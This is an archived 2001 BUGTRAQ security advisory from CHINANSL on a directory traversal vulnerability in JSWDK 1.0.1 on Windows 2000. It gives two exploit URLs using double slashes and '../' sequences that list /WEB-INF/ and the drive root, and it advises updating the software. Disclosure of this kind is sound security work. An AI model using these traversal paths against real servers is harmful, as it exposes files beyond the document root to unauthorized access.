From lovehacker@263.NET Wed Mar 28 19:02:11 2001 From: lovehacker To: BUGTRAQ@SECURITYFOCUS.COM Date: Wed, 28 Mar 2001 06:48:07 -0000 Subject: [BUGTRAQ] CHINANSL Security Advisory(CSA-200106) Topic: JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 Directory traversal Vulnerability vulnerable: Microsoft Win2000 กกกก+JSWDK1.0.1 maybe for other operating system also. discussion: A security vulnerability has been found in Windows NT/2000 systems that have JSWDK 1.0.1 installed.The vulnerability allows remote attackers to access files outside the document root directory scope. exploits: http://localhost:8080/examples//WEB-INF/ listing /WEB-INF/ Directory . http://localhost:8080/../examples//WEB-INF/../../../../../ if JSWDK installd in c:\ the question will listing c:\ all file and directory. solution: Update JSWDK Copyright 2000-2001 CHINANSL. All Rights Reserved. Terms of use. CHINANSL Security Team CHINANSL INFORMATION TECHNOLOGY CO.,LTD (http://www.chinansl.com)